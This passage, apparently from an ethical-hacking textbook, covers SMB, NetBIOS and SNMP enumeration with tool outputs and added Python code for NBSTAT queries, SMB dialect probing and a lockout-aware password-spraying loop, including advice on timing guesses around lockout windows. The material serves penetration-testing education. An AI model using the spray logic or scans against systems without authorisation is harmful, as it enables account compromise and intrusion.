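Added example, not code from the book, Windows or Samba. This is the query
nbtstat -A and nmblookup -S send to UDP 137 (RFC 1002, sections 4.2.17 and
4.2.18): ask the "*" name for NBSTAT and receive every name the node has
registered, with the suffix byte that says which service each stands for.
Runs offline against a constructed reply; node_status() is a live query.
"""
import socket
import struct

NBSTAT, CLASS_IN = 0x0021, 0x0001
# Common NetBIOS suffixes (the 16th byte of a name) and the service they mark.
SUFFIXES = {0x00: "Workstation Service", 0x03: "Messenger Service",
            0x20: "File Server Service", 0x1B: "Domain Master Browser",
            0x1C: "Domain Controllers", 0x1D: "Master Browser",
            0x1E: "Browser Service Elections"}


def encode_name(name, suffix=0x00):
    """First-level encoding: 15 bytes of name + suffix, each byte split into two 'A'-based nibbles."""
    if name == "*":
        raw = b"*" + b"\x00" * 15   # the wildcard name is NUL padded, not space padded
    else:
        raw = name.upper().ljust(15).encode("ascii")[:15] + bytes([suffix])
    encoded = "".join(chr(65 + (b >> 4)) + chr(65 + (b & 0x0F)) for b in raw)
    return bytes([32]) + encoded.encode("ascii") + b"\x00"   # label length, 32 chars, root


def build_node_status_request(trn_id):
    """NBSTAT query for '*': 12-byte header with one question, no recursion, unicast."""
    header = struct.pack(">6H", trn_id, 0x0000, 1, 0, 0, 0)
    return header + encode_name("*") + struct.pack(">HH", NBSTAT, CLASS_IN)


def parse_node_status_response(data, trn_id):
    """Return (names, mac); names is a list of (name, suffix, 'UNIQUE'|'GROUP', active)."""
    r_id, flags, _qdcount, ancount = struct.unpack_from(">4H", data, 0)
    if r_id != trn_id or not flags & 0x8000 or ancount < 1:
        raise ValueError("not a node status response to our query")
    off = 12 + 34                                  # header + encoded RR_NAME
    rr_type, _rr_class, _ttl, _rdlength = struct.unpack_from(">HHIH", data, off)
    if rr_type != NBSTAT:
        raise ValueError("unexpected RR type 0x%04x" % rr_type)
    off += 10
    num_names = data[off]
    off += 1
    names = []
    for _ in range(num_names):                     # NODE_NAME entries are 18 bytes each
        raw, suffix, nflags = struct.unpack_from(">15sBH", data, off)
        off += 18
        names.append((raw.decode("ascii", "replace").rstrip(), suffix,
                      "GROUP" if nflags & 0x8000 else "UNIQUE",   # G bit
                      bool(nflags & 0x0400)))                      # ACT bit
    mac = ":".join("%02X" % b for b in data[off:off + 6])   # STATISTICS.UNIT_ID
    return names, mac


def format_like_nbtstat(names, mac):
    """Render the table roughly the way nbtstat -A prints it, with the suffix meaning appended."""
    lines = ["       Name               Type         Status"]
    for name, suffix, kind, active in names:
        status = "Registered" if active else "Inactive"
        lines.append("    %-15s<%02X>  %-7s     %s  (%s)"
                     % (name, suffix, kind, status, SUFFIXES.get(suffix, "unknown")))
    lines.append("    MAC Address = " + mac.replace(":", "-"))
    return "\n".join(lines)


def node_status(host, timeout=2.0):
    """Live NBSTAT query to UDP 137 (not exercised by the tests)."""
    trn_id = 0x1A2B
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_node_status_request(trn_id), (host, 137))
        data, _ = sock.recvfrom(1024)
    return parse_node_status_response(data, trn_id)


def _constructed_response(trn_id, entries, mac):
    """Build a reply the way a Windows host would; constructed test data, not a capture."""
    rdata = bytes([len(entries)])
    for name, suffix, nflags in entries:
        rdata += name.upper().ljust(15).encode("ascii") + bytes([suffix]) + struct.pack(">H", nflags)
    rdata += bytes.fromhex(mac.replace(":", "")) + b"\x00" * 40   # STATISTICS: UNIT_ID + the rest
    header = struct.pack(">6H", trn_id, 0x8400, 0, 1, 0, 0)        # response, authoritative, 1 answer
    rr = encode_name("*") + struct.pack(">HHIH", NBSTAT, CLASS_IN, 0, len(rdata))
    return header + rr + rdata


# Constructed sample mirroring the chapter's nbtstat -a billthecat output.
SAMPLE_RESPONSE = _constructed_response(0x1A2B, [
    ("BILLTHECAT", 0x00, 0x0400), ("BILLTHECAT", 0x20, 0x0400), ("WORKGROUP", 0x00, 0x8400),
], "AC:87:A3:36:D6:AA")

if __name__ == "__main__":
    print(format_like_nbtstat(*parse_node_status_response(SAMPLE_RESPONSE, 0x1A2B)))
```

Because the query is a single unicast datagram to port 137, this is also the one NetBIOS function that does not need a presence on the broadcast domain: any host that lets UDP 137 through will answer it, which is why node status requests are among the first things an external scanner tries.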
nmap Scripts

nmap continues to be relevant to us, even though we've moved beyond the port scanning phase. Here, we are looking to gather more information using the scripts that are provided. At the time of this writing, there are 35 SMB-related scripts included with the nmap installed on the latest version of Kali Linux. Next, you can see a portion of the output from one of them, smb-os-discovery, whose name appears in the output. This is a Windows system that has been set up for sharing. You'll see that nmap has identified it very specifically, down to the service pack that has been installed. Interestingly, there are several other systems on the network where SMB-based sharing is enabled, but none of them gets identified. The big difference between those and this one is that those systems only have port 445 open, while this one also has ports 135 and 139 open. That is not a coincidence: smb-os-discovery reads the operating system and LAN Manager strings an SMB1 server returns during session setup, so a host that only speaks SMB2 (the usual case for a modern Windows or macOS system with SMB1 disabled) gives it nothing to report; the smb2-security-mode and smb2-capabilities scripts are the SMB2-era equivalents.

smb-os-discovery Scan Output

Nmap scan report for stevedallas.lan (192.168.86.50)
Host is up (0.00058s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 46:5E:C8:0A:B7:D1 (Unknown)

Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: stevedallas
|   NetBIOS computer name: STEVEDALLAS\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-01-04T20:30:27-06:00

There are several important pieces of information we can use nmap to look for. There are enumeration scripts for users, groups, services, processes, and shares. Some of these require authentication before the remote system will give anything up. Microsoft began restricting null session access by default with Windows Server 2008 R2 and Windows 7. Any operating system after that will require authentication before it allows access to the interprocess communication needed to extract the information requested. However, the setting can be changed, and you never know when you will run across very outdated or misconfigured systems. You can see the failure of the share enumeration script in nmap here. The listing shows that even though authentication was required, the script still attempted common share names.

Enumerating Shares with Nmap

Nmap scan report for stevedallas.lan (192.168.86.50)
Host is up (0.00040s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 46:5E:C8:0A:B7:D1 (Unknown)

Host script results:
| smb-enum-shares:
|   note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
|   account_used: <blank>
|   \\192.168.86.50\ADMIN$:
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: <none>
|   \\192.168.86.50\C$:
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: <none>
|   \\192.168.86.50\IPC$:
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: READ
|   \\192.168.86.50\USERS:
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|_    Anonymous access: <none>

One of the common share names tried is IPC$. This is a share name allowing access to named pipes, which are a method of interprocess communication, and it is the one share here that anonymous access could read. Another share name nmap checked for is C$. This is an administrative share that Windows creates automatically. Again, older versions of Windows allowed easier access to this share, but since Windows XP there have been more restrictions on its use. It does enable administrators to function remotely, but accessing it requires more than just login credentials. The login credentials have to be for an administrator.

While nmap does have other scripts that can be used against systems running SMB, most of them are not for enumeration. Many of them are specific to vulnerability identification or confirmation. Since we are focusing on enumeration, we can put off looking at those other scripts until a later time.
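Every SMB script and module in this chapter opens with the same exchange: a Negotiate Protocol request in which the client lists the dialects it speaks, and the server either answers in SMB1 (choosing one of the offered strings by index) or, if "SMB 2.???" was among them, switches to SMB2 and reports a DialectRevision. The code below is an added example, not from the book, nmap or Metasploit. It builds that request for direct TCP on port 445, parses both kinds of answer, and reports the dialect and whether message signing is required, which is how a scanner distinguishes an SMB1-only host from a modern one before it asks anything else. The two responses it parses offline are constructed; negotiate() runs the live exchange.

```python
"""Build an SMB Negotiate Protocol request and parse the server's answer.

Added example, not code from the book, nmap or Metasploit. The client offers
dialect strings; the server answers in SMB1 (DialectIndex into our list) or,
because we offered "SMB 2.002"/"SMB 2.???", in SMB2 with a DialectRevision.
Runs offline against constructed responses; negotiate() is the live exchange.
"""
import socket
import struct

SMB_COM_NEGOTIATE = 0x72
DIALECTS = ["NT LM 0.12", "SMB 2.002", "SMB 2.???"]
SMB2_REVISIONS = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1", 0x0300: "SMB 3.0",
                  0x0302: "SMB 3.0.2", 0x0311: "SMB 3.1.1"}


def _frame(msg):
    """Direct-TCP transport header: type byte 0x00 plus a 3-byte big-endian length."""
    return struct.pack(">I", len(msg)) + msg


def _smb1_header(flags):
    """32-byte SMB1 header for SMB_COM_NEGOTIATE (MS-CIFS 2.2.3.1)."""
    return struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", SMB_COM_NEGOTIATE,
                       0,        # NT status
                       flags,    # 0x18 in a request; servers set 0x80 (reply) in responses
                       0xC801,   # Flags2: Unicode, NT status codes, extended security, long names
                       0, b"\x00" * 8, 0,       # PIDHigh, SecurityFeatures, Reserved
                       0, 0xFEFF, 0, 0)         # TID, PIDLow, UID, MID


def build_negotiate_request(dialects=DIALECTS):
    """Header + WordCount 0 + ByteCount + one 0x02-prefixed, NUL-terminated string per dialect."""
    body = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    return _frame(_smb1_header(0x18) + struct.pack("<BH", 0, len(body)) + body)


def parse_negotiate_response(frame, dialects=DIALECTS):
    """Return {'protocol', 'dialect', 'signing_required'} for an SMB1 or SMB2 reply frame."""
    (length,) = struct.unpack(">I", frame[:4])
    msg = frame[4:4 + (length & 0x00FFFFFF)]
    if msg[:4] == b"\xfeSMB":
        # SMB2 header is 64 bytes; body starts StructureSize(2) SecurityMode(2) DialectRevision(2)
        sec_mode, revision = struct.unpack_from("<HH", msg, 64 + 2)
        return {"protocol": "SMB2",
                "dialect": SMB2_REVISIONS.get(revision, "0x%04x" % revision),
                "signing_required": bool(sec_mode & 0x02)}
    if msg[:4] == b"\xffSMB":
        # SMB1 header is 32 bytes; then WordCount(1) DialectIndex(2) SecurityMode(1)
        _word_count, index, sec_mode = struct.unpack_from("<BHB", msg, 32)
        if index == 0xFFFF:   # none of the offered dialects was acceptable
            return {"protocol": "SMB1", "dialect": None, "signing_required": False}
        return {"protocol": "SMB1", "dialect": dialects[index],
                "signing_required": bool(sec_mode & 0x08)}
    raise ValueError("not an SMB negotiate response")


def negotiate(host, port=445, timeout=3.0):
    """Live exchange (not exercised by the tests): send the request, read one response frame."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_negotiate_request())
        head = sock.recv(4)
        (length,) = struct.unpack(">I", head)
        want = length & 0x00FFFFFF
        body = b""
        while len(body) < want:
            chunk = sock.recv(want - len(body))
            if not chunk:
                break
            body += chunk
    return parse_negotiate_response(head + body)


def _smb2_response(revision, sec_mode):
    """Constructed SMB2 NEGOTIATE response (64-byte header + 65-byte body); test data, not a capture."""
    header = b"\xfeSMB" + struct.pack("<HHIHHIIQIIQ16s", 64, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, sec_mode, revision, 0, b"\x00" * 16,
                       0, 65536, 65536, 65536, 0, 0, 128, 0, 0) + b"\x00"
    return _frame(header + body)


def _smb1_response(index, sec_mode):
    """Constructed SMB1 'NT LM 0.12' negotiate response (WordCount 17); test data, not a capture."""
    words = struct.pack("<HBHHIIIIQHB", index, sec_mode, 50, 1, 16644, 65536, 0, 0x8000E3FD, 0, 0, 8)
    challenge = b"\x11" * 8
    return _frame(_smb1_header(0x98) + bytes([17]) + words + struct.pack("<H", len(challenge)) + challenge)


# Constructed samples: an SMB 2.1 server with signing enabled but not required,
# and an SMB1-only server that requires signing.
SMB2_SAMPLE = _smb2_response(0x0210, 0x01)
SMB1_SAMPLE = _smb1_response(0, 0x0F)

if __name__ == "__main__":
    for sample in (SMB2_SAMPLE, SMB1_SAMPLE):
        print(parse_negotiate_response(sample))
```

The first branch is the one a scanner cares about most: a server that answers "NT LM 0.12" to an offer that included "SMB 2.???" has SMB1 enabled and no SMB2 support, which on a Windows host is a finding in itself. To test a host over NetBIOS on TCP 139 instead, the same SMB message would be preceded by a NetBIOS session request rather than sent directly.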
NetBIOS Enumerator

When running NetBIOS Enumerator, you provide a range of IP addresses, and it will start scanning the network. Once it identifies a system that supports SMB, it starts to query the system to get as much information as it can. One item that is missing from the output for each of the hosts found is the username of the person logged in. The reason the username is missing is that this is an unauthenticated scan. The program has not done any authentication against the remote system, so there is some information that won't be available. SMB is a bit of a promiscuous protocol in the sense that it will provide a lot of information, but it only provides enough information for remote services to work. It doesn't provide everything you can potentially ask for unless you have authenticated.

240 Chapter 6 Enumeration

Metasploit

Metasploit has modules for just about every aspect of ethical hacking. It can be used in so many different ways. As shown earlier, we can definitely use it for enumeration, and when it comes to SMB, there are several modules that you can run. As an example, we can look for SMB versions across the network. In the following listing, you will see a run of the smb_version module. You should get an idea of the version of the SMB service that's running. What you can see are two systems that have been identified with the operating system version listed. From that information, you can identify the version of SMB that's supported. The Windows XP system is running SMB version 1 because version 2 didn't come out until Windows Vista was released. According to the SMB version history, the Windows 7 system would be using SMB version 2.1. While it looks like this may be an outdated scan, having old systems around is useful for practicing attacks on, since they are more likely to have vulnerable versions of software.

SMB Version Scan with Metasploit

msf auxiliary(scanner/smb/smb_version) > run
[*] Scanned  26 of 256 hosts (10% complete)
[*] 192.168.86.26:445  - Host could not be identified: ()
[*] 192.168.86.27:445  - Host could not be identified: ()
[*] 192.168.86.32:445  - Host could not be identified: ()
[*] 192.168.86.41:445  - Host could not be identified: ()
[+] 192.168.86.49:445  - Host is running Windows XP SP2 (language:English) (name:OPUS-C765F2) (workgroup:WORKGROUP)
[+] 192.168.86.50:445  - Host is running Windows 7 Professional SP1 (build:7601) (name:STEVEDALLAS) (workgroup:WORKGROUP)
[*] Scanned  52 of 256 hosts (20% complete)
[*] 192.168.86.61:445  - Host could not be identified: ()

We can also use Metasploit to enumerate users. To do that, you would use the smb_enumusers_domain module. If you know one, you can use a username and password. This would allow the module to authenticate against the system to obtain additional users. This is not required, though you're much less likely to get a list of users without authentication of some sort. Fortunately, there is another module you can use to help you get at least one username and password. The smb_login module can be used to attempt username/password combinations. Here you can see the list of options for the smb_login module.

smb_login Module Options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target address range or CIDR identifier
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts
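The options above (USER_FILE, PASS_FILE, USER_AS_PASS, BLANK_PASSWORDS, STOP_ON_SUCCESS, ABORT_ON_LOCKOUT) describe a credential-guessing loop whose main operational risk is locking out the very accounts you are enumerating. The following is an added example, not Metasploit's code, that reproduces that loop's ordering and lockout handling in Python around a pluggable attempt callback. The FakeDirectory class, its accounts and the password list are constructed for the demonstration; on a live target you would point attempt at a real SMB login (for instance impacket's SMBConnection.login, which is assumed here and not shown).

```python
"""Credential guessing in the style of smb_login, with the ordering and lockout
handling that its USER_AS_PASS, BLANK_PASSWORDS, STOP_ON_SUCCESS and
ABORT_ON_LOCKOUT options control.  Added example, not Metasploit code: the SMB
exchange sits behind the `attempt(user, password)` callback, and FakeDirectory
is a constructed stand-in used only to exercise the logic offline."""
from collections import defaultdict

SUCCESS, FAILURE, LOCKED = "success", "failure", "locked"


def build_guesses(users, passwords, user_as_pass=False, blank_passwords=False):
    """Yield (user, password) pairs password-major: every user sees one password
    before any user sees a second, so failures stay spread evenly across accounts."""
    candidates = [""] if blank_passwords else []
    for p in passwords:
        if p not in candidates:
            candidates.append(p)
    if user_as_pass:  # USER_AS_PASS is a per-user guess, emitted as its own round
        for u in users:
            yield u, u
    for p in candidates:
        for u in users:
            if user_as_pass and p == u:
                continue  # already sent in the USER_AS_PASS round
            yield u, p


def guess(users, passwords, attempt, *, lockout_threshold=None, user_as_pass=False,
          blank_passwords=False, stop_on_success=False, abort_on_lockout=True):
    """Drive `attempt` over the guesses.  `lockout_threshold` is the target's
    bad-password count; the loop never sends an account the failure that would
    trip it.  Returns (found_credentials, aborted_on_lockout)."""
    failures = defaultdict(int)
    done, found = set(), []
    for user, password in build_guesses(users, passwords, user_as_pass, blank_passwords):
        if user in done:
            continue
        if lockout_threshold is not None and failures[user] >= lockout_threshold - 1:
            continue  # one more failure would lock this account; leave it alone
        result = attempt(user, password)
        if result == SUCCESS:
            found.append((user, password))
            done.add(user)
            if stop_on_success:
                break
        elif result == LOCKED:  # the policy tripped anyway (our threshold was wrong)
            if abort_on_lockout:
                return found, True
            done.add(user)
        else:
            failures[user] += 1
    return found, False


def naive_guess(users, passwords, attempt):
    """User-major loop with no lockout awareness, for contrast."""
    found = []
    for u in users:
        for p in passwords:
            if attempt(u, p) == SUCCESS:
                found.append((u, p))
                break
    return found


class FakeDirectory:
    """Constructed stand-in for a domain with an account-lockout policy."""

    def __init__(self, creds, threshold):
        self.creds, self.threshold = creds, threshold
        self.bad, self.locked = defaultdict(int), set()

    def attempt(self, user, password):
        if user in self.locked:
            return LOCKED
        if self.creds.get(user) == password:
            return SUCCESS
        self.bad[user] += 1
        if self.bad[user] >= self.threshold:
            self.locked.add(user)
            return LOCKED
        return FAILURE


if __name__ == "__main__":
    users = ["alice", "bob", "carol"]                         # constructed sample
    passwords = ["Password1", "Winter2021", "Summer2021"]     # constructed sample
    creds = {"bob": "Password1", "carol": "carol"}             # constructed sample
    d = FakeDirectory(creds, threshold=3)
    print("naive:", naive_guess(users, passwords, d.attempt), "locked:", sorted(d.locked))
    d = FakeDirectory(creds, threshold=3)
    print("guarded:", guess(users, passwords, d.attempt, lockout_threshold=3,
                            user_as_pass=True), "locked:", sorted(d.locked))
```

Against the sample directory the naive loop locks two of the three accounts and misses the username-as-password hit, while the guarded spray finds both credentials without a single lockout. On a live domain the order matters for a second reason the simulation does not model: lockout counters reset after an observation window, so if you need more passwords per account than the threshold allows, you pause between rounds for longer than that window rather than lowering the guard.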
Using the smb_login module, you can provide files that contain usernames and passwords. The module will try to authenticate using the username and password combinations. One thing you will also see is that you can tell the module to try the username as a password. This is commonly disallowed by password policies, but you may run across systems where password policies aren't in place, making it possible for the username and password to be the same.

As with nmap, Metasploit has multiple modules that can be used against SMB systems. Many of them are related to identifying vulnerabilities. It does provide another tool that you can use to gather information, and the advantage to using Metasploit is that it's backed up with a database where information is stored. You can retrieve host data, services, and other details about the target from the database. This makes it a good record-keeping tool as well as a tool that can be used for enumeration and other forms of scanning.

Other Utilities

Considering the number of devices that use SMB for networking, it's not surprising that there are many tools available for enumerating SMB systems. The program nbtscan is one of those. It provides details about systems it finds on the local network, including the NetBIOS name, user, MAC address, and IP address. In the following listing, you can see the output of scanning my home network, identifying every system that has Windows shares available. The scan range has been provided on the command line here, but you can also provide the IP addresses in a file.

Scanning a Network with nbtscan

root@kali:~# nbtscan 192.168.86.0/24
Doing NBT name scan for addresses from 192.168.86.0/24

IP address       NetBIOS Name     Server    User             MAC address
------------------------------------------------------------------------------
192.168.86.0     Sendto failed: Permission denied
192.168.86.44    NPI110654                                   00:00:00:00:00:00
192.168.86.52    BOBBIE                     BOBBIE           00:00:00:00:00:00
192.168.86.49    OPUS-C765F2                                 00:50:56:3b:ac:3e
192.168.86.170   MILOBLOOM                                   ac:87:a3:1e:6b:30
192.168.86.50    STEVEDALLAS                                 46:5e:c8:0a:b7:d1
192.168.86.26    YAZPISTACHIO                                f0:18:98:0c:34:69
192.168.86.61    MILOBLOOM                                   ac:87:a3:1e:6b:30
192.168.86.32    BILLTHECAT                                  ac:87:a3:36:d6:aa
192.168.86.27    BINKLEY                                     8c:85:90:5a:7e:f2
192.168.86.255   Sendto failed: Permission denied

Getting the output here, just as with any tool, is helpful, but at some point you need to do something with the information, not least putting it into a report for your client or employer. One nice thing about nbtscan is the ability to generate output that can be manipulated programmatically. This may include taking the output and putting it into a database. While you can certainly read in values with whitespace separators, nbtscan lets you specify a separator that may make the output easier to parse; for example, you can specify a comma as the separator and then open the output in a spreadsheet program. Adding -s followed by whatever character you want to use as a separator will get you the same output as shown earlier, just with your specified separator between the different fields.

You may start to see a bit of a pattern when it comes to enumeration and SMB. While there are a lot of tools available, they all perform the same functions, and the easiest thing to do when it comes to enumeration is to identify systems that use SMB, including the name they advertise on the network. One note about that name: it may not resolve to an IP address. A name announced using NetBIOS is intended to be used and resolved on the local network. This means it won't resolve using DNS unless DNS is configured to use the same names and IP addresses. It's possible to have one name for your Windows sharing and another one for your DNS, assuming the system even has a DNS address. If your enterprise network uses WINS, they will resolve to be the same because of how the local systems register with WINS.

Another tool, and we'll see the same capabilities with this one, is enum4linux. The following example is being run from a Kali Linux system where it is installed by default, but it's easy enough to get a copy of it. It's just a Perl script, so to run it, you need a Perl interpreter. The following example enumerates the shares on a specific host, identified by IP address. The target system is a Linux system running Samba to provide Windows networking functionality over SMB. In the output, you will find a lot of information related to how Samba is configured. As an example, we can see that the workgroup WORKGROUP is configured, which is a way of organizing systems on a local network that are all using Windows networking.

enum4linux Share Enumeration

root@kali:~# enum4linux -S 192.168.86.52
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jan  3 12:18:25 2021

 ==========================
|    Target Information    |
 ==========================
Target ........... 192.168.86.52
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 =====================================================
|    Enumerating Workgroup/Domain on 192.168.86.52    |
 =====================================================
[+] Got domain/workgroup name: WORKGROUP

 ======================================
|    Session Check on 192.168.86.52    |
 ======================================
[+] Server 192.168.86.52 allows sessions using username '', password ''

 ============================================
|    Getting domain SID for 192.168.86.52    |
 ============================================
Domain Name: WASHERE
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ==========================================
|    Share Enumeration on 192.168.86.52    |
 ==========================================
WARNING: The "syslog" option is deprecated

        Sharename       Type      Comment
        ---------       ----      -------
        homes           Disk      Home Directories
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (bobbie server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            STEVEDALLAS

[+] Attempting to map shares on 192.168.86.52

At the bottom, you can see the different share names. This includes IPC$, which is used for interprocess communication between hosts. This allows for management of systems remotely. Using enum4linux, we can finally see the master browser on the network. The system named STEVEDALLAS holds the current authoritative list of all the systems on the network. This is a system that has been elected by other systems on the network, which essentially means it has volunteered, and based on its characteristics, no one else has challenged it. The reason for STEVEDALLAS to be the master browser is that it is one of only a couple of Windows systems, and of the two or three that were actual Windows systems and not Linux or macOS running SMB services, STEVEDALLAS has the most recent operating system.

Using SMB-related utilities, we can gather a lot of information from the target network. As noted earlier, it's generally necessary to be on the local network to be able to use any of these tools. One reason for this can be the broadcast domain orientation of Windows networking: announcements on the local network. Another is that Windows networking ports are commonly blocked by firewalls. Also, it's entirely possible that desktop networks, where the systems are most likely to be communicating with SMB, often use private addresses that may not be exposed to the outside world. To get to them, because they are nonroutable by convention, you'd have to be on a network where there would at least be routing rules to get to those target networks, meaning there is network reachability. While desktops are not the only devices that will communicate using SMB, since servers do as well, they are the systems that are going to be the most numerous in most instances. As always, when you are starting to look at the desktops, make sure you have an agreement to look at them with your employer. Not everyone will want the desktop networks to be touched because it can impede productivity for their users. They may also feel like they are most interested in traditional, technical vulnerabilities that are exposed to the outside world, without thinking about lateral movement within the organization or the fact that the desktops are the most common target for attackers today.

Simple Network Management Protocol

The Simple Network Management Protocol (SNMP) has been around since the late '80s, though it has gone through several iterations. The first iteration, version 1 (SNMPv1), was introduced in 1988. It continues to be used in spite of being superseded by other versions in the intervening years. SNMPv1 also includes a number of flaws that make it problematic from a security perspective. It is a binary protocol (ASN.1 BER-encoded), but there is no encryption supported with it. This means anyone who can obtain the packets being transmitted can decode them easily enough, community string included. A second problem is that there is very weak authentication. SNMPv1 uses community strings to gain access. You either get read-only access or get read-write access. There is no granularity beyond that. There is also no concept of users. You provide the appropriate string and you get that level of access. Perhaps worse, though, is the fact that the community strings commonly used are so well known. The string "public" is used for read-only, while the string "private" is used for read-write. This is not hard-coded, but it is very common.

Version 2 introduced some fixes to what was widely known as a problematic protocol. First, it introduced enhanced authentication over the basic community string model from v1. However, alongside v2 came v2c, which retained the implementation of the community strings for authentication. This meant that existing tools could continue to just use community strings without having to implement any additional authentication mechanisms. However, v2 and v1 are incompatible. The message specifications in v2 are different from those in v1, so even if your tool was just using community strings, it couldn't just be dropped in place and expected to work with a number of systems using v1.

Version 3 implemented additional fixes and is considered to be a significant improvement over the previous versions. First, it supports encryption rather than plaintext transmissions. Second, it supports user-based authentication. This means you get better accountability to know who is doing what. This is important, since SNMP can be used not only to monitor devices but also to set parameters on the endpoint.

A basic SNMP architecture would have agents installed on endpoints, while a server system could be used to poll those agents periodically to get measurements for monitoring purposes. An SNMP agent can serve up information that is stored in management information bases (MIBs). These MIBs are defined data structures, using Abstract Syntax Notation One (ASN.1). Each node or data element gets an object identifier (OID), which is a long dotted string of numeric values. Getting or setting any value from the agent requires supplying the correct OID that corresponds with the value you are looking for.

SNMP can supply a lot of different information that is useful if the right MIBs are installed and operating correctly on the agent. This can include things like the system name and the version of the kernel being run on the system. In the following example, you can see the use of the program snmpwalk to "walk" the MIB tree to gather data from the agent. This starts at the top level of the tree and gathers what it can find there. From the output of snmpwalk, you can see the system name as well as the kernel identifier. Additionally, you can see some contact information that was configured in the SNMP agent.

snmpwalk of Linux System

root@kali:~# snmpwalk -v1 -c public 192.168.86.52
iso.3.6.1.2.1.1.1.0 = STRING: "Linux bobbie 4.15.0-30-generic #32-Ubuntu SMP Sun Jan 4 17:42:43 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (7606508) 21:07:45.08
iso.3.6.1.2.1.1.4.0 = STRING: "Foo"
iso.3.6.1.2.1.1.5.0 = STRING: "bobbie"
iso.3.6.1.2.1.1.6.0 = STRING: "Erie, CO"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92

There are a number of MIBs that can be pulled that will yield essential information. One of these is the interface table, ifTable. If you walk the ifTable, you will get a list of all of the interfaces on the system and how they are configured. In a tiered network design, you can get an understanding of additional networks the system may be connected to. With this information, you can continue to build out the network map you have been creating as you identify networks and systems.

One advantage to SNMP is that it is perhaps most commonly used on network equipment like routers and switches. As these may not have traditional means of gaining access and may not have more traditional ideas of users, using SNMP to gather information from these devices can be a good entry point. As usual, though, a protocol like SNMP is generally blocked by firewalls. In other words, you would usually have to be allowed specific access to the network device through a firewall or access control list before you could start to request MIB data from a network device. SNMP agents that are properly implemented and configured shouldn't just give out sensitive system information to anyone who asks for it.

Simple Mail Transfer Protocol

Like so many other protocols, SMTP operates using a series of verbs to interact with the server. The client sends a verb and any other necessary parameters to the SMTP server. Based on the verb, the server knows how to handle the parameters received. Unlike other, simpler protocols, though, communicating with SMTP is an entire conversation. Before you start, you have to greet the server. This tells the server what flavor of SMTP you are going to be speaking. You then tell the server what you want to do. Based on the function you are trying to perform, you may have to provide additional information. This may include providing credentials. You can see an example of a simple SMTP conversation next. This is entirely manual, so you can see the conversation at the protocol level and how you might interact with an SMTP server.

SMTP Conversation

